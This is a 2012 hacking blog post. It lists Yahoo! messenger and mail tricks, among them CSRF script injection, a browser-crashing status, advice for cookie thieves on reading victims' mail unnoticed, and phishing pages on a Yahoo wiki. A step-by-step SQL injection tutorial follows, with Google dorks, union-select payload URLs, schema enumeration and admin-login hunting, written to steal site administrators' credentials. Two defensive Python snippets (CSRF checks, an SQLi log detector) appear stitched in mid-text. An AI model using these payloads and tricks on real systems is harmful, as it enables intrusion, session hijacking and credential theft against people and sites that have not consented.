Saturday, 25 February 2012

YAHOO! VULNERABILITIES + TIPS AND TRICKS

1. Webmessenger China

- The eternal CSRF

http://cn.webmessenger.yahoo.com - an application that looks fairly ordinary for Yahoo!. It is not quite so. The Chinese webmessenger version is nowhere near the same as the version at http://webmessenger.yahoo.com.

So what is the problem?

Log in with one user on http://cn.webmessenger.yahoo.com.
Log in with another user on the normal Yahoo! Messenger client. Make sure the user you are logged in with on the Messenger client is in the friend list of the user logged in on the webmessenger.
On the Messenger client set yourself to online and put the following code in your status:
Surprise. The code is executed in the browser where you are logged in with the other user.
Impact: given that this is CSRF, an attacker can steal your login session or inject malicious code without you being able to tell that anything is happening.



2. My Chatroom trick

Did you know you can use Yahoo! services to create your own messaging service?
Go to http://cn.messenger.yahoo.com/webmsgr/code.php. After logging in you are given an HTML snippet containing a link. What can you do with that link? Simple. Take this link as an example:
http://cn.webmessenger.yahoo.com/index.php?t=1&to=eWlkPXJvb3QuZmxvb2Q-&sig=63761f8f753f4857bf8a275e46d7b3175cba5585

If you are logged in you will start a normal conversation with the user who created that link, but if you were not logged in beforehand and you open that link you will be given a random name with which you can send messages to that user without any problem.
Try it and you will see.



3. Webmessenger.yahoo.com

Browser DOS

I tried to apply the vulnerability found in the Chinese webmessenger version here as well, but the results were different. Although it accepts certain statuses containing HTML tags, the application at webmessenger.yahoo.com does not support tags like . The result of such attempts will be the same whatever browser you use: a flash9.ocx error that closes the browser. It is quite simply the best booter for the web version of the famous Yahoo! Messenger.
Note: the version in Yahoo! Mail beta is not vulnerable.



4. Change password trick - interesting but useless

I will briefly explain the following possible problem. Do you know that to get to the change-password page you first have to re-enter your password? Those who steal cookies in bulk probably know this very well. Well, to reach that page all you need is to open the following link https://edit.yahoo.com/config/change_pw?.src=ym (after you are already logged in to mail). As I said, interesting but useless as long as you do not know the current password.



5. Trick - Messenger list (not the address book)

Log in to your account. Open the following link:
http://i.cn.yahoo.com/invites/picker.html?imp=yim

You will see your Messenger list on that page. It is also useful when you logged in using only a cookie.


6. Trick - link to an avatar

To see a user's avatar use the following link:
http://img.msg.yahoo.com/avatar.php?yids=INTRODUCETIUSERULAICI&format=png

To see the avatar a user created on http://avatars.yahoo.com use the following link:
http://lookup.avatars.yahoo.com/wimages?yid=INTRODUCETIUSERULAICI&size=medium&type=jpg


7. CSRF - how to enable mail beta using an image tag (trick).

Send someone who uses Yahoo! Mail Classic an HTML attachment with the following content:


After they view your message, their mail will automatically switch to the beta version.

CSRF - How to disable mail beta using an image tag

Send someone who uses Yahoo! Mail beta an HTML attachment with the following content:



After they view your message, their mail will automatically switch to the Classic version.

Caution: on mail beta you may have to show the images manually, because mail beta has a block-images option.
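Both tricks above work for the same reason: merely requesting the settings URL, which an image tag does as a plain GET, is enough to change the setting. The helper below is an added example, not Yahoo! code or the author's, showing the checks a settings endpoint would apply so that an embedded image cannot flip it. The function names, the `csrf_token` field and the `SITE_ORIGIN` value are hypothetical.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://mail.example.com"  # constructed: the site being protected

def issue_csrf_token(session):
    """Create a per-session secret and store it; the settings form embeds it."""
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return token

def same_origin(header_value, site_origin):
    """Compare scheme and host exactly; a prefix match would accept
    mail.example.com.evil.net as if it were mail.example.com."""
    if not header_value:
        return False
    a, b = urlsplit(header_value), urlsplit(site_origin)
    return (a.scheme, a.netloc) == (b.scheme, b.netloc)

def settings_change_allowed(method, headers, form, session, site_origin=SITE_ORIGIN):
    """Decide whether a request may change an account setting.

    Returns (allowed, reason). An <img src=...> can only produce a GET with no
    form fields, so the first check alone stops the image-tag case; the origin
    and token checks cover forms submitted from other sites.
    """
    if method.upper() != "POST":
        return False, "setting changes require POST"
    # Browsers send Origin on POST; fall back to Referer for older clients.
    origin = headers.get("Origin") or headers.get("Referer")
    if not same_origin(origin, site_origin):
        return False, "request did not come from this site"
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return False, "missing or wrong csrf token"
    return True, "ok"

if __name__ == "__main__":
    session = {}
    token = issue_csrf_token(session)
    # The image-tag request: a GET carrying the victim's cookies but nothing else.
    print(settings_change_allowed("GET", {"Referer": "https://mail.example.com/inbox"}, {}, session))
    # A legitimate submission from the site's own settings form.
    print(settings_change_allowed("POST", {"Origin": SITE_ORIGIN}, {"csrf_token": token}, session))
```

The order of the checks matters for logging: a GET to a state-changing URL is worth recording on its own, because it is exactly the request shape the image-tag trick produces.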


8. Useful links for cookie thieves:

How many times has it happened that you got into someone's mail, they had mail beta enabled, and you ended up signed in on the victim's Messenger ID without meaning to? What is the best way to avoid the Messenger built into the mail beta version while at the same time leaving no trace when you change the mail version manually? Because the victim can open their mail at any time and notice the version change. Well, there is the "switch to classic mail just one time" solution. It is very simple and depends on... a URL. When you load the cookie into the browser, take care not to log straight in on mail.yahoo.com. Use the link:

http://us.mg1.mail.yahoo.com/ym/login?ymv=0

This opens classic mail without permanently changing the original settings the account owner left. Simple, isn't it?

For your general knowledge, also take a look at
http://us.mg1.mail.yahoo.com/dc/system_requirements?browser=unsupported


9. Trick - how to log in using a simple link

I don't know what use it could be to you, but here are 2 login links:

http://n16.login.scd.yahoo.com/config?login=USERNAME&passwd=PASSWORD
http://edit.india.yahoo.com/config/login?.patner=sbc&passwd=PASSWORD&login=USERNAME&.save=0


10. Yahoo! Wiki - phishing with Yahoo!'s help

Did you know Yahoo! Wiki existed? Probably not. Here is what it was created for:
http://developer.yahoo.net/hackday-wiki/index.cgi?action=revisions&page_name=HomePage&revision_id=22


And here is how else it can be used:
http://developer.yahoo.net/hackday-wiki/index.cgi?NemessisRSTZONE

The notion of URL spoofing is well known to most. But sometimes you don't even need it. You can create a page on that wiki yourself and put in any content. You can insult someone or ask for the usernames and passwords of those reading the page. The beauty is that you can customise the link used for the phishing. For example, the page:

http://developer.yahoo.net/hackday-wiki/index.cgi?NemessisRSTZONE will be created the moment I open it. I will hit edit and put in my content (for example: I'm a legit Yahoo service. Just send me your password at hacker@yahoo.com).
In this day and age, how many people would believe a phishing message hosted on a Yahoo page? I suppose a great many. Such an oversight should not exist, least of all at one of the most attacked companies in the world.


11. Mysterious are the ways of sessions
Surprise! Did you know there is a 24-hour limit after which the cookie expires? Well, not quite. Slick discovered a method to extend its life far beyond that. Many felt a false sense of security, thinking that if they became XSS victims they would be out of trouble within 24 hours. Now everything has changed. The method is and will remain private.

FULL DETAILED BASIC SQL INJECTION

An SQL Injection is basically a code injection that exploits an area vulnerable to SQL Injection. The injected code exploits the database to get information such as emails, usernames, passwords, etc.
In this Tutorial, we'll be looking for the Admin Panel's credentials. Keep in mind, I said Admin Panel, not control panel. While performing an SQL Injection, you may not always find what you're looking for. Some sites have secured the important information, so that it will not be compromised so easily. 

Finding a Vulnerable Site

You can find a vulnerable site using dorks. Use Google, it's the best way. A dork is something like this:

inurl:news.php?id=
inurl:event.php?id=
inurl:order.php?id=
inurl:user.php?id=
inurl:restaurant.php?id=
inurl:buy.php?id=

There are Hundreds of Thousands of others, and there are also some Posts about Dorks, so you could read those if you want to find a good site to exploit with SQL Injection.


Exploiting the Database

Alright? Are you all ready for the fun of an SQL Injection? Okay, so first, we need to test our site to see if it's vulnerable to SQL Injection. I will use a random site name for my Example:

http://www.hopefullyvulnerablesite.com/event.php?id=1
Our site HAS to have an '=' in it. Otherwise we cannot use SQL Injection to exploit the Database. So after the 1 (In the ID) put a ' so that it looks like this:

http://www.hopefullyvulnerablesite.com/event.php?id=1'
Now if we get a MySQL error, then our site is probably vulnerable. If it just refreshes the page normally, then our site is not vulnerable. 



Finding the number of columns

Now we know our site is vulnerable to SQL Injection, so we want to start getting the info out of the database. But before we do that, we have to find out WHICH columns are vulnerable to SQL Injection. But we don't know how many columns there are yet, so we need that first. To find the number of columns we need to use a command called 'Order By'. This command will help us determine how many columns there are. So your URL should now look like this:
http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 2--
Now if the site just refreshed to its normal state, that's good. We didn't get an error, so we have to continue until we get an error.

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 3--
*NO ERROR*

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 4--
*NO ERROR*

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 5--
*ERROR*

Okay, we got an error on column 5. That means there are only 4 columns. Since the 5th column doesn't exist, we got an error.
URGENT
The two hyphens (--) are critical for executing the command: they turn whatever follows in the original query into a comment, so only our injected part runs. So we NEED those at the end of every command.



Finding the vulnerable column

We now have the number of columns. But we just need to find out which one(s) are vulnerable to the execution of SQL commands. So we will use a command called "union select". This is what will find the vulnerable column(s). So we need to add that command into our URL. After that command, we need to add the number of columns there are. So now our URL should look like this:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,2,3,4--
A couple of numbers will appear on your screen. That is normal, and is a good sign. Those numbers are the columns that are vulnerable to SQL Injection, so those are the columns we need to execute our commands in. So let's say that column 2 appeared on the page. We will be executing commands in column 2.

URGENT

You HAVE to have the - after the =. That is critical. 


Determining the Version of the MySQL Database

Why do we need the version you ask? Because the version will let us know what commands we can use. I consider version 5 easier. So I will tell you how to get information from the Database with version 5. 

So our vulnerable column is 2. So that's where we'll be executing the code. Replace the 2 with your command. The command is: @@version. So your URL should now look like this:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,@@version,3,4--
Now it should display the Version on the page. It should look something like this:

5.1.47-community-log
The exact numbers don't matter, as long as the major version is 5 or higher.


Finding the name of the Database

The name of the database is important, at least if we want to look in the tables which will contain the information. To find the name of the database there are two common ways. They both will work. The first command is:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schemata--
Sometimes that command will show you more than the database name. But all we want is the database name, so the better command would preferably be:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,concat(database()),3,4--
Now you will be showed the Database name. Congrats, look how far we are already. Now to the good stuff!

Viewing the Tables in the Database

The tables are what contains information. That's why we need to view them. So we can get the information we seek.

The command to view the tables is longer than the few we've seen already. So here's what your URL should now look like:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--
Hit enter, and the Tables in the Database will be displayed.  



Viewing the Tables' information

We will most likely be given many tables. It is up to you to decide which one contains the valuable information.

So it can be at times difficult to choose a table that would contain important information. However, we will not always need the username, as it is most likely "admin". But the password, is what we REALLY need. So choose a table. The one I will use for this example will be "admin_credentials". It's very rare that you'll get a Table with a title basically making you choose that one. So this time use this query/command:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="admin_credentials"
For that query, you will almost ALWAYS get an error. So instead, convert the 'admin_credentials' to Hex.

To do that, I recommend this site: http://www.swingnote.com/tools/texttohex.php

Once you've converted your Table Name to Hex, you'll need to use the query again, but with Hex. So it should look like this:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x61646d696e5f63726564656e7469616c73
URGENT
You MUST have the 0x after the =. The 0x will let the site know that you are executing the command with HEX. So it's critical. Otherwise, it will NOT work.



Displaying the Contents

There will still be columns inside the table you've chosen. So you need to get the information out of them, and that will usually mean goodbye tables, and HELLO Admin Panel access.

Let's say that mine is displaying "userpword" and "user". Those are the only columns that are displaying for me (However, this will very rarely be the case). So we need to access the information in there. We can access them both at a time actually. But if you prefer one at a time, use this query:

http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(userpword),3,4 FROM DBName.admin_credentials--
That will display the information. Where it says DBName, you need to put the name of the database you got earlier in this tutorial. And where it says admin_credentials, you need to put the table that you are inside of.

Now we should have all the credentials, so we just need to find the Admin Login.
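Every step of the walk-through above leaves a distinctive query string in the web server's access log, which is how this whole sequence gets caught. The script below is an added example, not part of the tutorial: it parses a few constructed Apache combined-format lines (TEST-NET addresses, the tutorial's own probe URLs plus two ordinary requests), URL-decodes each parameter value and tags the patterns from the steps above: a trailing quote after a numeric id, `order by N--`, `union select`, `information_schema`, `@@version` and `0x` hex literals. The rule names and the two-hit threshold are my own choices.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format lines (addresses and host invented); the
# request targets reproduce the tutorial's probe URLs plus two ordinary requests.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Feb/2012:10:00:01 +0200] "GET /event.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Feb/2012:10:00:04 +0200] "GET /event.php?id=1' HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Feb/2012:10:00:09 +0200] "GET /event.php?id=1%20order%20by%205-- HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Feb/2012:10:00:15 +0200] "GET /event.php?id=-1%20union%20select%201,@@version,3,4-- HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Feb/2012:10:00:21 +0200] "GET /event.php?id=-1+union+select+1,group_concat(column_name),3,4+FROM+information_schema.columns+WHERE+table_name=0x61646d696e5f63726564656e7469616c73 HTTP/1.1" 200 4902 "-" "Mozilla/5.0"
198.51.100.23 - - [25/Feb/2012:10:01:00 +0200] "GET /event.php?id=2 HTTP/1.1" 200 5088 "-" "Mozilla/5.0"
198.51.100.23 - - [25/Feb/2012:10:01:03 +0200] "GET /news.php?id=15&page=2 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Each rule is applied to the URL-decoded parameter value, not to the raw URL,
# so %20 or + encoding of the spaces does not hide the keywords.
RULES = [
    ("quote-probe",         re.compile(r"^\s*-?\d+\s*'$")),
    ("order-by-probe",      re.compile(r"\border\s+by\s+\d+\s*(--|#)?\s*$", re.I)),
    ("union-select",        re.compile(r"\bunion(\s+all)?\s+select\b", re.I)),
    ("schema-enumeration",  re.compile(r"\binformation_schema\.", re.I)),
    ("version-fingerprint", re.compile(r"@@version|\bversion\(\)", re.I)),
    ("hex-literal",         re.compile(r"=\s*0x[0-9a-f]+", re.I)),
]

def classify_value(value):
    """Names of every rule the decoded parameter value trips, in RULES order."""
    return [name for name, rx in RULES if rx.search(value)]

def scan_log(text):
    """One hit per suspicious parameter: who sent it, where, why, and the status code."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            reasons = classify_value(value)
            if reasons:
                hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "param": key,
                             "value": value, "status": int(m.group("status")),
                             "reasons": reasons})
    return hits

def suspicious_sources(hits, threshold=2):
    """Addresses with at least `threshold` hits: one odd request is noise, a run is a probe."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return {ip for ip, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(h["ip"], h["status"], h["param"], ", ".join(h["reasons"]))
    print("probing sources:", sorted(suspicious_sources(found)))
```

The status codes are worth keeping next to the rule names: the quote and `order by 5` probes produce 500s while the `union select` requests return 200, and that change from errors to successes on one source address marks the point where the probe turned into extraction.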



Finding the AdminLogin

Usually, all you'll have to do is take a quick look by adding a small /admin or /index.php/admin.

Like this:

http://www.hopefullyvulnerablesite.com/admin
http://www.hopefullyvulnerablesite.com/admin.php
http://www.hopefullyvulnerablesite.com/login.php
http://www.hopefullyvulnerablesite.com/admin/index.php
http://www.hopefullyvulnerablesite.com/login/index.php
http://www.hopefullyvulnerablesite.com/adminlogin
http://www.hopefullyvulnerablesite.com/adminlogin.php
http://www.hopefullyvulnerablesite.com/adminlogin/index.php
http://www.hopefullyvulnerablesite.com/moderator.php
http://www.hopefullyvulnerablesite.com/moderator
http://www.hopefullyvulnerablesite.com/modlogin

And there are plenty more. At times you will not find the login, so you'll need an "Admin Login" finder. There are some online, and there are also downloads. I recommend doing it manually, because it brings more pride after hacking the website.